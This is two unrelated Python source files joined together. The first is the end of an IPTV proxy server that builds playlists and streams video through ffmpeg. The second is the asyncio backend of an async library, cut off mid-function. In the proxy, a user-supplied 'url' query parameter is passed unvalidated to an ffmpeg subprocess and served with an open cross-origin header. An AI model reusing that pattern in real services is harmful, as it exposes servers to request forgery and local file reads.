url = template.format(SRVR, SITE, sanitized_channel, sanitized_qual, token['hash'])
logger.debug(url)
if request.args.get('url'):
logger.info("Piping custom URL")
url = request.args.get('url')
if '|' in url:
url = url.split('|')[0]
logger.debug(url)
import subprocess
def generate():
logger.debug("starting generate function")
cmdline = list()
cmdline.append(FFMPEGLOC)
cmdline.append("-i")
cmdline.append(url)
cmdline.append("-vcodec")
cmdline.append("copy")
cmdline.append("-acodec")
cmdline.append("copy")
cmdline.append("-f")
cmdline.append("mpegts")
cmdline.append("pipe:1")
logger.debug(cmdline)
FNULL = open(os.devnull, 'w')
proc = subprocess.Popen(cmdline, stdout=subprocess.PIPE, stderr=FNULL)
logger.debug("pipe started")
try:
f = proc.stdout
byte = f.read(512)
while byte:
yield byte
byte = f.read(512)
finally:
proc.kill()
return Response(response=generate(), status=200, mimetype='video/mp2t',
headers={'Access-Control-Allow-Origin': '*', "Content-Type": "video/mp2t",
"Content-Disposition": "inline", "Content-Transfer-Enconding": "binary"})
############################################################
# MAIN
############################################################
if __name__ == "__main__":
logger.info("Initializing")
load_settings()
if os.path.exists(TOKEN_PATH):
load_token()
check_token()
fallback = False
logger.info("Building initial playlist...")
try:
# fetch chan_map
try:
chan_map = build_channel_map()
except:
# cannot get response from fog, resorting to fallback
fallback = True
chan_map = build_channel_map_sstv()
jsonGuide1 = getJSON("iptv.json", "https://iptvguide.netlify.com/iptv.json",
"https://fast-guide.smoothstreams.tv/altepg/feed1.json")
jsonGuide2 = getJSON("tv.json", "https://iptvguide.netlify.com/tv.json",
"https://fast-guide.smoothstreams.tv/altepg/feedall1.json")
playlist = build_playlist(SERVER_HOST)
kodiplaylist = build_kodi_playlist()
tvhplaylist = build_tvh_playlist()
# Download icons, runs in sep thread, takes ~1min
try:
di = threading.Thread(target=dl_icons, args=(len(chan_map),))
di.setDaemon(True)
di.start()
except (KeyboardInterrupt, SystemExit):
sys.exit()
dl_epg()
except:
logger.exception("Exception while building initial playlist: ")
exit(1)
try:
thread.start_new_thread(thread_playlist, ())
except:
_thread.start_new_thread(thread_playlist, ())
if AUTO_SERVER: testServers()
print("\n\n##############################################################")
print("Main Menu - %s/index.html" % urljoin(SERVER_HOST, SERVER_PATH))
print("Contains all the information located here and more!")
print("##############################################################\n\n")
print("\n##############################################################")
print("m3u8 url is %s/playlist.m3u8" % urljoin(SERVER_HOST, SERVER_PATH))
print("kodi m3u8 url is %s/kodi.m3u8" % urljoin(SERVER_HOST, SERVER_PATH))
print("EPG url is %s/epg.xml" % urljoin(SERVER_HOST, SERVER_PATH))
print("Sports EPG url is %s/sports.xml" % urljoin(SERVER_HOST, SERVER_PATH))
print("Plex Live TV url is %s" % urljoin(SERVER_HOST, SERVER_PATH))
print("TVHeadend network url is %s/tvh.m3u8" % urljoin(SERVER_HOST, SERVER_PATH))
print("External m3u8 url is %s/external.m3u8" % urljoin(EXT_HOST, SERVER_PATH))
print("Combined m3u8 url is %s/combined.m3u8" % urljoin(SERVER_HOST, SERVER_PATH))
print("Combined EPG url is %s/combined.xml" % urljoin(SERVER_HOST, SERVER_PATH))
print("Static m3u8 url is %s/static.m3u8" % urljoin(SERVER_HOST, SERVER_PATH))
print("TVH's own EPG url is http://%s:9981/xmltv/channels" % TVHURL)
print("Static XSPF url is %s/static.xspf" % urljoin(SERVER_HOST, SERVER_PATH))
print("Dynamic XSPF url is %s/playlist.xspf" % urljoin(SERVER_HOST, SERVER_PATH))
print("##############################################################\n")
if __version__ < latest_ver:
logger.info(
"Your version (%s%s) is out of date, the latest is %s, which has now be downloaded for you into the 'updates' subdirectory." % (
type, __version__, latest_ver))
newfilename = ntpath.basename(latestfile)
if not os.path.isdir(os.path.join(os.path.dirname(sys.argv[0]), 'updates')):
os.mkdir(os.path.join(os.path.dirname(sys.argv[0]), 'updates'))
requests.urlretrieve(latestfile, os.path.join(os.path.dirname(sys.argv[0]), 'updates', newfilename))
else:
logger.info("Your version (%s) is up to date." % (__version__))
logger.info("Listening on %s:%d", LISTEN_IP, LISTEN_PORT)
try:
a = threading.Thread(target=thread_updater)
a.setDaemon(True)
a.start()
except (KeyboardInterrupt, SystemExit):
sys.exit()
# debug causes it to load twice on initial startup and every time the script is saved, TODO disbale later
try:
app.run(host=LISTEN_IP, port=LISTEN_PORT, threaded=True, debug=False)
except:
os.system('cls' if os.name == 'nt' else 'clear')
logger.exception("Proxy failed to launch, try another port")
logger.info("Finished!")
|
_asyncio.py | import asyncio
import concurrent.futures
import math
import socket
import sys
from collections import OrderedDict, deque
from concurrent.futures import Future
from dataclasses import dataclass
from functools import wraps
from inspect import isgenerator
from socket import AddressFamily, SocketKind, SocketType
from threading import Thread
from types import TracebackType
from typing import (
Any, Awaitable, Callable, Coroutine, Deque, Dict, Generator, List, Optional, Sequence, Set,
Tuple, Type, TypeVar, Union, cast)
from weakref import WeakKeyDictionary
from .. import TaskInfo, abc
from .._core._eventloop import claim_worker_thread, threadlocals
from .._core._exceptions import (
BrokenResourceError, BusyResourceError, ClosedResourceError, EndOfStream)
from .._core._exceptions import ExceptionGroup as BaseExceptionGroup
from .._core._exceptions import WouldBlock
from .._core._sockets import GetAddrInfoReturnType, convert_ipv6_sockaddr
from .._core._synchronization import ResourceGuard
from ..abc.sockets import IPSockAddrType, UDPPacketType
if sys.version_info >= (3, 7):
from asyncio import all_tasks, create_task, current_task, get_running_loop
from asyncio import run as native_run
from contextlib import asynccontextmanager
else:
from async_generator import asynccontextmanager
_T = TypeVar('_T')
def native_run(main, *, debug=False):
# Snatched from Python 3.7
from asyncio import coroutines, events, tasks
def _cancel_all_tasks(loop):
to_cancel = all_tasks(loop)
if not to_cancel:
return
for task in to_cancel:
task.cancel()
loop.run_until_complete(
tasks.gather(*to_cancel, loop=loop, return_exceptions=True))
for task in to_cancel:
if task.cancelled():
continue
if task.exception() is not None:
loop.call_exception_handler({
'message': 'unhandled exception during asyncio.run() shutdown',
'exception': task.exception(),
'task': task,
})
if events._get_running_loop() is not None:
raise RuntimeError(
"asyncio.run() cannot be called from a running event loop")
if not coroutines.iscoroutine(main):
raise ValueError("a coroutine was expected, got {!r}".format(main))
loop = events.new_event_loop()
try:
events.set_event_loop(loop)
loop.set_debug(debug)
return loop.run_until_complete(main)
finally:
try:
_cancel_all_tasks(loop)
loop.run_until_complete(loop.shutdown_asyncgens())
finally:
events.set_event_loop(None)
loop.close()
def create_task(coro: Union[Generator[Any, None, _T], Awaitable[_T]], *, # type: ignore
name: Optional[str] = None) -> asyncio.Task:
return get_running_loop().create_task(coro)
def get_running_loop() -> asyncio.AbstractEventLoop:
loop = asyncio._get_running_loop()
if loop is not None:
return loop
else:
raise RuntimeError('no running event loop')
def all_tasks(loop: Optional[asyncio.AbstractEventLoop] = None) -> Set[asyncio.Task]:
"""Return a set of all tasks for the loop."""
from asyncio import Task
if loop is None:
loop = get_running_loop()
return {t for t in Task.all_tasks(loop) if not t.done()}
def current_task(loop: Optional[asyncio.AbstractEventLoop] = None) -> Optional[asyncio.Task]:
if loop is None:
loop = get_running_loop()
return asyncio.Task.current_task(loop)
T_Retval = TypeVar('T_Retval')
# Check whether there is native support for task names in asyncio (3.8+)
_native_task_names = hasattr(asyncio.Task, 'get_name')
def get_callable_name(func: Callable) -> str:
module = getattr(func, '__module__', None)
qualname = getattr(func, '__qualname__', None)
return '.'.join([x for x in (module, qualname) if x])
#
# Event loop
#
def _maybe_set_event_loop_policy(policy: Optional[asyncio.AbstractEventLoopPolicy],
use_uvloop: bool) -> None:
# On CPython, use uvloop when possible if no other policy has been given and if not
# explicitly disabled
if policy is None and use_uvloop and sys.implementation.name == 'cpython':
try:
import uvloop
except ImportError:
pass
else:
# Test for missing shutdown_default_executor() (uvloop 0.14.0 and earlier)
if (not hasattr(asyncio.AbstractEventLoop, 'shutdown_default_executor')
or hasattr(uvloop.loop.Loop, 'shutdown_default_executor')):
policy = uvloop.EventLoopPolicy()
if policy is not None:
asyncio.set_event_loop_policy(policy)
def run(func: Callable[..., T_Retval], *args, debug: bool = False, use_uvloop: bool = True,
policy: Optional[asyncio.AbstractEventLoopPolicy] = None) -> T_Retval:
@wraps(func)
async def wrapper():
task = current_task()
task_state = TaskState(None, get_callable_name(func), None)
_task_states[task] = task_state
if _native_task_names:
task.set_name(task_state.name)
try:
return await func(*args)
finally:
del _task_states[task]
_maybe_set_event_loop_policy(policy, use_uvloop)
return native_run(wrapper(), debug=debug)
#
# Miscellaneous
#
async def sleep(delay: float) -> None:
await checkpoint()
await asyncio.sleep(delay)
#
# Timeouts and cancellation
#
CancelledError = asyncio.CancelledError
class CancelScope(abc.CancelScope):
__slots__ = ('_deadline', '_shield', '_parent_scope', '_cancel_called', '_active',
'_timeout_task', '_tasks', '_host_task', '_timeout_expired')
def __init__(self, deadline: float = math.inf, shield: bool = False):
self._deadline = deadline
self._shield = shield
self._parent_scope: Optional[CancelScope] = None
self._cancel_called = False
self._active = False
self._timeout_task: Optional[asyncio.Task] = None
self._tasks: Set[asyncio.Task] = set()
self._host_task: Optional[asyncio.Task] = None
self._timeout_expired = False
async def __aenter__(self):
async def timeout():
await asyncio.sleep(self._deadline - get_running_loop().time())
self._timeout_expired = True
await self.cancel()
if self._active:
raise RuntimeError(
"Each CancelScope may only be used for a single 'async with' block"
)
self._host_task = current_task()
self._tasks.add(self._host_task)
try:
task_state = _task_states[self._host_task]
except KeyError:
task_name = self._host_task.get_name() if _native_task_names else None
task_state = TaskState(None, task_name, self)
_task_states[self._host_task] = task_state
else:
self._parent_scope = task_state.cancel_scope
task_state.cancel_scope = self
if self._deadline != math.inf:
if get_running_loop().time() >= self._deadline:
self._cancel_called = True
self._timeout_expired = True
else:
self._timeout_task = get_running_loop().create_task(timeout())
self._active = True
return self
async def __aexit__(self, exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> Optional[bool]:
self._active = False
if self._timeout_task:
self._timeout_task.cancel()
assert self._host_task is not None
self._tasks.remove(self._host_task)
host_task_state = _task_states.get(self._host_task)
if host_task_state is not None and host_task_state.cancel_scope is self:
host_task_state.cancel_scope = self._parent_scope
if exc_val is not None:
exceptions = exc_val.exceptions if isinstance(exc_val, ExceptionGroup) else [exc_val]
if all(isinstance(exc, CancelledError) for exc in exceptions):
if self._timeout_expired:
return True
elif not self._parent_cancelled():
# This scope was directly cancelled
return True
return None
async def _cancel(self):
# Deliver cancellation to directly contained tasks and nested cancel scopes
for task in self._tasks:
# Cancel the task directly, but only if it's blocked and isn't within a shielded scope
cancel_scope = _task_states[task].cancel_scope
if cancel_scope is self:
# Only deliver the cancellation if the task is already running (but not this task!)
try:
running = task._coro.cr_running
awaitable = task._coro.cr_await
except AttributeError:
running = task._coro.gi_running
awaitable = task._coro.gi_yieldfrom
if not running and awaitable is not None:
task.cancel()
elif not cancel_scope._shielded_to(self):
await cancel_scope._cancel()
def _shielded_to(self, parent: Optional['CancelScope']) -> bool:
# Check whether this task or any parent up to (but not including) the "parent" argument is
# shielded
cancel_scope: Optional[CancelScope] = self
while cancel_scope is not None and cancel_scope is not parent:
if cancel_scope._shield:
return True
else:
cancel_scope = cancel_scope._parent_scope
return False
def _parent_cancelled(self) -> bool:
# Check whether any parent has been cancelled
cancel_scope = self._parent_scope
while cancel_scope is not None and not cancel_scope._shield:
if cancel_scope._cancel_called:
return True
else:
cancel_scope = cancel_scope._parent_scope
return False
async def cancel(self) -> None:
if self._cancel_called:
return
self._cancel_called = True
await self._cancel()
@property
def deadline(self) -> float:
return self._deadline
@property
def cancel_called(self) -> bool:
return self._cancel_called
@property
def shield(self) -> bool:
return self._shield
async def checkpoint():
try:
cancel_scope = _task_states[current_task()].cancel_scope
except KeyError:
cancel_scope = None
while cancel_scope:
if cancel_scope.cancel_called:
raise CancelledError
elif cancel_scope.shield:
break
else:
cancel_scope = cancel_scope._parent_scope
await asyncio.sleep(0)
@asynccontextmanager
async def fail_after(delay: float, shield: bool):
deadline = get_running_loop().time() + delay
async with CancelScope(deadline, shield) as scope:
yield scope
if scope._timeout_expired:
raise TimeoutError
@asynccontextmanager
async def move_on_after(delay: float, shield: bool):
deadline = get_running_loop().time() + delay
async with CancelScope(deadline=deadline, shield=shield) as scope:
yield scope
async def current_effective_deadline():
deadline = math.inf
cancel_scope = _task_states[current_task()].cancel_scope
while cancel_scope:
deadline = min(deadline, cancel_scope.deadline)
if cancel_scope.shield:
break
else:
cancel_scope = cancel_scope._parent_scope
return deadline
async def current_time():
return get_running_loop().time()
#
# Task states
#
class TaskState:
"""
Encapsulates auxiliary task information that cannot be added to the Task instance itself
because there are no guarantees about its implementation.
"""
__slots__ = 'parent_id', 'name', 'cancel_scope'
def __init__(self, parent_id: Optional[int], name: Optional[str],
cancel_scope: Optional[CancelScope]):
self.parent_id = parent_id
self.name = name
self.cancel_scope = cancel_scope
_task_states = WeakKeyDictionary() # type: WeakKeyDictionary[asyncio.Task, TaskState]
#
# Task groups
#
class ExceptionGroup(BaseExceptionGroup):
def __init__(self, exceptions: Sequence[BaseException]):
super().__init__()
self.exceptions = exceptions
class TaskGroup(abc.TaskGroup):
__slots__ = 'cancel_scope', '_active', '_exceptions'
def __init__(self):
self.cancel_scope: CancelScope = CancelScope()
self._active = False
self._exceptions: List[BaseException] = []
async def __aenter__(self):
await self.cancel_scope.__aenter__()
self._active = True
return self
async def __aexit__(self, exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> Optional[bool]:
ignore_exception = await self.cancel_scope.__aexit__(exc_type, exc_val, exc_tb)
if exc_val is not None:
await self.cancel_scope.cancel()
if not ignore_exception:
self._exceptions.append(exc_val)
while self.cancel_scope._tasks:
try:
await asyncio.wait(self.cancel_scope._tasks)
except asyncio.CancelledError:
await self.cancel_scope.cancel()
self._active = False
if not self.cancel_scope._parent_cancelled():
exceptions = self._filter_cancellation_errors(self._exceptions)
else:
exceptions = self._exceptions
try:
if len(exceptions) > 1:
raise ExceptionGroup(exceptions)
elif exceptions and exceptions[0] is not exc_val:
raise exceptions[0]
except BaseException as exc:
# Clear the context here, as it can only be done in-flight.
# If the context is not cleared, it can result in recursive tracebacks (see #145).
exc.__context__ = None
raise
return ignore_exception
@staticmethod
def _filter_cancellation_errors(exceptions: Sequence[BaseException]) -> List[BaseException]:
filtered_exceptions: List[BaseException] = []
for exc in exceptions:
if isinstance(exc, ExceptionGroup):
exc.exceptions = TaskGroup._filter_cancellation_errors(exc.exceptions)
if exc.exceptions:
if len(exc.exceptions) > 1:
filtered_exceptions.append(exc)
else:
filtered_exceptions.append(exc.exceptions[0])
elif not isinstance(exc, CancelledError):
filtered_exceptions.append(exc)
return filtered_exceptions
async def _run_wrapped_task(self, func: Callable[..., Coroutine], args: tuple) -> None:
task = cast(asyncio.Task, current_task())
try:
await func(*args)
except BaseException as exc:
self._exceptions.append(exc)
await self.cancel_scope.cancel()
finally:
self.cancel_scope._tasks.remove(task)
del _task_states[task] # type: ignore
async def spawn(self, func: Callable[..., Coroutine], *args, name=None) -> None:
if not self._active:
raise RuntimeError('This task group is not active; no new tasks can be spawned.')
name = name or get_callable_name(func)
if _native_task_names is None:
task = create_task(self._run_wrapped_task(func, args), name=name) # type: ignore
else:
task = create_task(self._run_wrapped_task(func, args))
# Make the spawned task inherit the task group's cancel scope
_task_states[task] = TaskState(parent_id=id(current_task()), name=name,
cancel_scope=self.cancel_scope)
self.cancel_scope._tasks.add(task)
#
# Threads
#
_Retval_Queue_Type = Tuple[Optional[T_Retval], Optional[BaseException]]
async def run_sync_in_worker_thread(
func: Callable[..., T_Retval], *args, cancellable: bool = False,
limiter: Optional['CapacityLimiter'] = None) -> T_Retval:
def thread_worker():
try:
with claim_worker_thread('asyncio'):
threadlocals.loop = loop
result = func(*args)
except BaseException as exc:
if not loop.is_closed():
asyncio.run_coroutine_threadsafe(limiter.release_on_behalf_of(task), loop)
if not cancelled:
loop.call_soon_threadsafe(queue.put_nowait, (None, exc))
else:
if not loop.is_closed():
asyncio.run_coroutine_threadsafe(limiter.release_on_behalf_of(task), loop)
if not cancelled:
loop.call_soon_threadsafe(queue.put_nowait, (result, None))
await checkpoint()
loop = get_running_loop()
task = current_task()
queue: asyncio.Queue[_Retval_Queue_Type] = asyncio.Queue(1)
cancelled = False
limiter = limiter or _default_thread_limiter
await limiter.acquire_on_behalf_of(task)
thread = Thread(target=thread_worker, daemon=True)
thread.start()
async with CancelScope(shield=not cancellable):
try:
retval, exception = await queue.get()
finally:
cancelled = True
if exception is not None:
raise exception
else:
return cast(T_Retval, retval)
def run_async_from_thread(func: Callable[..., Coroutine[Any, Any, T_Retval]], *args) -> T_Retval:
f: concurrent.futures.Future[T_Retval] = asyncio.run_coroutine_threadsafe(
func(*args), threadlocals.loop)
return f.result()
class BlockingPortal(abc.BlockingPortal):
__slots__ = '_loop'
def __init__(self):
super().__init__()
self._loop = get_running_loop()
def _spawn_task_from_thread(self, func: Callable, args: tuple, future: Future) -> None:
asyncio.run_coroutine_threadsafe(
self._task_group.spawn(self._call_func, func, args, future), self._loop)
#
# Subprocesses
#
@dataclass
class StreamReaderWrapper(abc.ByteReceiveStream):
_stream: asyncio.StreamReader
async def receive(self, max_bytes: int = 65536) -> bytes:
data = await self._stream.read(max_bytes)
if data:
return data
else:
raise EndOfStream
async def aclose(self) -> None:
self._stream.feed_eof()
@dataclass
class StreamWriterWrapper(abc.ByteSendStream):
_stream: asyncio.StreamWriter
async def send(self, item: bytes) -> None:
self._stream.write(item)
await self._stream.drain()
async def aclose(self) -> None:
self._stream.close()
@dataclass
class Process(abc.Process):
_process: asyncio.subprocess.Process
_stdin: Optional[abc.ByteSendStream]
_stdout: Optional[abc.ByteReceiveStream]
_stderr: Optional[abc.ByteReceiveStream]
async def aclose(self) -> None:
if self._stdin:
await self._stdin.aclose()
if self._stdout:
await self._stdout.aclose()
if self._stderr:
await self._stderr.aclose()
await self.wait()
async def wait(self) -> int:
return await self._process.wait()
def terminate(self) -> None:
self._process.terminate()
def kill(self) -> None:
self._process.kill()
def send_signal(self, signal: int) -> None:
self._process.send_signal(signal)
@property
def pid(self) -> int:
return self._process.pid
@property
def returncode(self) -> Optional[int]:
return self._process.returncode
@property
def stdin(self) -> Optional[abc.ByteSendStream]:
return self._stdin
@property
def stdout(self) -> Optional[abc.ByteReceiveStream]:
return self._stdout
@property
def stderr(self) -> Optional[abc.ByteReceiveStream]:
return self._stderr
async def open_process(command, *, shell: bool, stdin: int, stdout: int, stderr: int):
await checkpoint()
if shell:
process = await asyncio.create_subprocess_shell(command, stdin=stdin, stdout=stdout,
stderr=stderr)
else:
process = await asyncio.create_subprocess_exec(*command, stdin=stdin, stdout=stdout,
stderr=stderr)
stdin_stream = StreamWriterWrapper(process.stdin) if process.stdin else None
stdout_stream = StreamReaderWrapper(process.stdout) if process.stdout else None
stderr_stream = StreamReaderWrapper(process.stderr) if process.stderr else None
return Process(process, stdin_stream, stdout_stream, stderr_stream)
#
# Sockets and networking
#
_read_events: Dict[socket.SocketType, asyncio.Event] = {}
_write_events: Dict[socket.SocketType, asyncio.Event] = {}
class StreamProtocol(asyncio.Protocol):
read_queue: Deque[bytes]
read_event: asyncio.Event
write_event: asyncio.Event
exception: Optional[Exception] = None
def connection_made(self, transport: asyncio.BaseTransport) -> None:
self.read_queue = deque()
self.read_event = asyncio.Event()
self.write_event = asyncio.Event()
self.write_event.set()
cast(asyncio.Transport, transport).set_write_buffer_limits(0)
def connection_lost(self, exc: Optional[Exception]) -> None:
self.exception = exc
self.read_event.set()
self.write_event.set()
def data_received(self, data: bytes) -> None:
self.read_queue.append(data)
self.read_event.set()
def eof_received(self) -> Optional[bool]:
self.read_event.set()
return None
def pause_writing(self) -> None:
self.write_event.clear()
def resume_writing(self) -> None:
self.write_event.set()
class DatagramProtocol(asyncio.DatagramProtocol):
read_queue: Deque[Tuple[bytes, IPSockAddrType]]
read_event: asyncio.Event
write_event: asyncio.Event
exception: Optional[Exception] = None
def connection_made(self, transport: asyncio.BaseTransport) -> None:
self.read_queue = deque(maxlen=100) # arbitrary value
self.read_event = asyncio.Event()
self.write_event = asyncio.Event()
self.write_event.set()
def connection_lost(self, exc: Optional[Exception]) -> None:
self.read_event.set()
self.write_event.set()
def datagram_received(self, data: bytes, addr: IPSockAddrType) -> None:
addr = convert_ipv6_sockaddr(addr)
self.read_queue.append((data, addr))
self.read_event.set()
def error_received(self, exc: Exception) -> None:
self.exception = exc
def pause_writing(self) -> None:
self.write_event.clear()
def resume_writing(self) -> None:
self.write_event.set()
class SocketStream(abc.SocketStream):
def __init__(self, transport: asyncio.Transport, protocol: StreamProtocol):
self._transport = transport
self._protocol = protocol
self._receive_guard = ResourceGuard('reading from')
self._send_guard = ResourceGuard('writing to')
self._closed = False
@property
def _raw_socket(self) -> socket.socket:
return self._transport.get_extra_info('socket')
async def receive(self, max_bytes: int = 65536) -> bytes:
with self._receive_guard:
await checkpoint()
if not self._protocol.read_queue and not self._transport.is_closing():
self._protocol.read_event.clear()
self._transport.resume_reading()
await self._protocol.read_event.wait()
self._transport.pause_reading()
try:
chunk = self._protocol.read_queue.popleft()
except IndexError:
if self._closed:
raise ClosedResourceError from None
elif self._protocol.exception:
raise BrokenResourceError from self._protocol.exception
else:
raise EndOfStream
if len(chunk) > max_bytes:
# Split the oversized chunk
chunk, leftover = chunk[:max_bytes], chunk[max_bytes:]
self._protocol.read_queue.appendleft(leftover)
return chunk
async def send(self, item: bytes) -> None:
with self._send_guard:
await checkpoint()
try:
self._transport.write(item)
except RuntimeError as exc:
if self._closed:
raise ClosedResourceError from None
elif self._transport.is_closing():
raise BrokenResourceError from exc
else:
raise
await self._protocol.write_event.wait()
async def send_eof(self) -> None:
try:
self._transport.write_eof()
except OSError:
pass
async def aclose(self) -> None:
if not self._transport.is_closing():
self._closed = True
try:
self._transport.write_eof()
except OSError:
pass
self._transport.close()
await asyncio.sleep(0)
self._transport.abort()
class SocketListener(abc.SocketListener):
def __init__(self, raw_socket: socket.SocketType):
self.__raw_socket = raw_socket
self._loop = cast(asyncio.BaseEventLoop, get_running_loop())
self._accept_guard = ResourceGuard('accepting connections from')
@property
def _raw_socket(self) -> socket.socket:
return self.__raw_socket
async def accept(self) -> abc.SocketStream:
with self._accept_guard:
await checkpoint()
try:
client_sock, _addr = await self._loop.sock_accept(self._raw_socket)
except asyncio.CancelledError:
# Workaround for https://bugs.python.org/issue41317
try:
self._loop.remove_reader(self._raw_socket)
except NotImplementedError:
pass
raise
if client_sock.family in (socket.AF_INET, socket.AF_INET6):
client_sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
transport, protocol = await self._loop.connect_accepted_socket(StreamProtocol, client_sock)
return SocketStream(cast(asyncio.Transport, transport), cast(StreamProtocol, protocol))
async def aclose(self) -> None:
self._raw_socket.close()
class UDPSocket(abc.UDPSocket):
def __init__(self, transport: asyncio.DatagramTransport, protocol: DatagramProtocol):
self._transport = transport
self._protocol = protocol
self._receive_guard = ResourceGuard('reading from')
self._send_guard = ResourceGuard('writing to')
self._closed = False
@property
def _raw_socket(self) -> SocketType:
return self._transport.get_extra_info('socket')
async def aclose(self) -> None:
if not self._transport.is_closing():
self._closed = True
self._transport.close()
async def receive(self) -> Tuple[bytes, IPSockAddrType]:
with self._receive_guard:
await checkpoint()
# If the buffer is empty, ask for more data
if not self._protocol.read_queue and not self._transport.is_closing():
self._protocol.read_event.clear()
await self._protocol.read_event.wait()
try:
return self._protocol.read_queue.popleft()
except IndexError:
if self._closed:
raise ClosedResourceError from None
else:
raise BrokenResourceError from None
async def send(self, item: UDPPacketType) -> None:
with self._send_guard:
await checkpoint()
await self._protocol.write_event.wait()
if self._closed:
raise ClosedResourceError
elif self._transport.is_closing():
raise BrokenResourceError
else:
self._transport.sendto(*item)
class ConnectedUDPSocket(abc.ConnectedUDPSocket):
def __init__(self, transport: asyncio.DatagramTransport, protocol: DatagramProtocol):
self._transport = transport
self._protocol = protocol
self._receive_guard = ResourceGuard('reading from')
self._send_guard = ResourceGuard('writing to')
self._closed = False
@property
def _raw_socket(self) -> SocketType:
return self._transport.get_extra_info('socket')
async def aclose(self) -> None:
if not self._transport.is_closing():
self._closed = True
self._transport.close()
async def receive(self) -> bytes:
with self._receive_guard:
await checkpoint()
# If the buffer is empty, ask for more data
if not self._protocol.read_queue and not self._transport.is_closing():
self._protocol.read_event.clear()
await self._protocol.read_event.wait()
try:
packet = self._protocol.read_queue.popleft()
except IndexError:
if self._closed:
raise ClosedResourceError from None
else:
raise BrokenResourceError from None
return packet[0]
async def send(self, item: bytes) -> None:
with self._send_guard:
await checkpoint()
await self._protocol.write_event.wait()
if self._closed:
raise ClosedResourceError
elif self._transport.is_closing():
raise BrokenResourceError
else:
self._transport.sendto(item)
async def connect_tcp(host: str, port: int,
local_addr: Optional[Tuple[str, int]] = None) -> SocketStream:
transport, protocol = cast(
Tuple[asyncio.Transport, StreamProtocol],
await get_running_loop().create_connection(StreamProtocol, host, port,
local_addr=local_addr)
)
transport.pause_reading()
return SocketStream(transport, protocol)
async def connect_unix(path: str) -> SocketStream:
transport, protocol = cast(
Tuple[asyncio.Transport, StreamProtocol],
await get_running_loop().create_unix_connection(StreamProtocol, path)
)
transport.pause_reading()
return SocketStream(transport, protocol)
async def create_udp_socket(
family: socket.AddressFamily,
local_address: Optional[IPSockAddrType],
remote_address: Optional[IPSockAddrType],
reuse_port: bool
) -> Union[UDPSocket, ConnectedUDPSocket]:
result = await get_running_loop().create_datagram_endpoint(
DatagramProtocol, local_addr=local_address, remote_addr=remote_address, family=family,
reuse_port=reuse_port)
transport = cast(asyncio.DatagramTransport, result[0])
protocol = cast(DatagramProtocol, result[1])
if protocol.exception:
transport.close()
raise protocol.exception
if not remote_address:
return UDPSocket(transport, protocol)
else:
return ConnectedUDPSocket(transport, protocol)
async def getaddrinfo(host: Union[bytearray, bytes, str], port: Union[str, int, None], *,
family: Union[int, AddressFamily] = 0, type: Union[int, SocketKind] = 0,
proto: int = 0, flags: int = 0) -> GetAddrInfoReturnType:
# https://github.com/python/typeshed/pull/4304
result = await get_running_loop().getaddrinfo(
host, port, family=family, type=type, proto=proto, flags=flags) # type: ignore[arg-type]
return cast(GetAddrInfoReturnType, result)
async def getnameinfo(sockaddr: IPSockAddrType, flags: int = 0) -> Tuple[str, str]:
# https://github.com/python/typeshed/pull/4305
result = await get_running_loop().getnameinfo(sockaddr, flags)
return cast(Tuple[str, str], result)
async def wait_socket_readable(sock: socket.SocketType) -> None:
await checkpoint()
if _read_events.get(sock):
raise BusyResourceError('reading from') from None
loop = get_running_loop()
event = _read_events[sock] = asyncio.Event()
get_running_loop().add_reader(sock, event.set)
try:
await event.wait()
finally:
if _read_events.pop(sock, None) is not None:
loop.remove_reader(sock)
readable = True
else:
readable = False
if not readable:
raise ClosedResourceError
async def wait_socket_writable(sock: socket.SocketType) -> None:
await checkpoint()
if _write_events.get(sock):
raise BusyResourceError('writing to') from None
loop = get_running_loop()
event = _write_events[sock] = asyncio.Event()
loop.add_writer(sock.fileno(), event.set)
try:
await event.wait()
finally:
if _write_events.pop(sock, None) is not None:
loop.remove_writer(sock)
writable = True
else:
writable = False
if not writable:
raise ClosedResourceError
#
# Synchronization
#
class Lock(abc.Lock):
def __init__(self):
self._lock = asyncio.Lock()
def locked(self) -> bool:
return self._lock.locked()
async def acquire(self) -> None:
await checkpoint()
await self._lock.acquire()
async def release(self) -> None:
self._lock.release()
class Condition(abc.Condition):
def __init__(self, lock: Optional[Lock]):
asyncio_lock = lock._lock if lock else None
self._condition = asyncio.Condition(asyncio_lock)
async def acquire(self) -> None:
await checkpoint()
await self._condition.acquire()
async def release(self) -> None:
self._condition.release()
def locked(self) -> bool:
return self._condition.locked()
async def notify(self, n=1):
self._condition.notify(n)
async def notify_all(self):
self._condition.notify_all()
async def wait(self):
await checkpoint()
return await self._condition.wait()
class Event(abc.Event):
def __init__(self):
self._event = asyncio.Event()
async def set(self):
self._event.set()
def is_set(self) -> bool:
return self._event.is_set()
async def wait(self):
await checkpoint()
await self._event.wait()
class Semaphore(abc.Semaphore):
def __init__(self, value: int):
self._semaphore = asyncio.Semaphore(value)
async def acquire(self) -> None:
await checkpoint()
await self._semaphore.acquire()
async def release(self) -> None:
self._semaphore.release()
@property
def value(self):
return self._semaphore._value
class CapacityLimiter(abc.CapacityLimiter):
def __init__(self, total_tokens: float):
self._set_total_tokens(total_tokens)
self._borrowers: Set[Any] = set()
self._wait_queue: Dict[Any, asyncio.Event] = OrderedDict()
async def __aenter__(self):
await self.acquire()
async def __aexit__(self, exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> None:
await self.release()
def _set_total_tokens(self, value: float) -> None:
if not isinstance(value, int) and not math.isinf(value):
raise TypeError('total_tokens must be an int or math.inf')
if value < 1:
raise ValueError('total_tokens must be >= 1')
self._total_tokens = value
@property
def total_tokens(self) -> float:
return self._total_tokens
async def set_total_tokens(self, value: float) -> None:
old_value = self._total_tokens
self._set_total_tokens(value)
events = []
for event in self._wait_queue.values():
if value <= old_value:
break
if not event.is_set():
events.append(event)
old_value += 1
for event in events:
event.set()
@property
def borrowed_tokens(self) -> int:
return len(self._borrowers)
@property
def available_tokens(self) -> float:
return self._total_tokens - len(self._borrowers)
async def acquire_nowait(self) -> None:
await self.acquire_on_behalf_of_nowait(current_task())
async def acquire_on_behalf_of_nowait(self, borrower) -> None:
if borrower in self._borrowers:
raise RuntimeError("this borrower is already holding one of this CapacityLimiter's "
"tokens")
if self._wait_queue or len(self._borrowers) >= self._total_tokens:
raise WouldBlock
self._borrowers.add(borrower)
async def acquire(self) -> None:
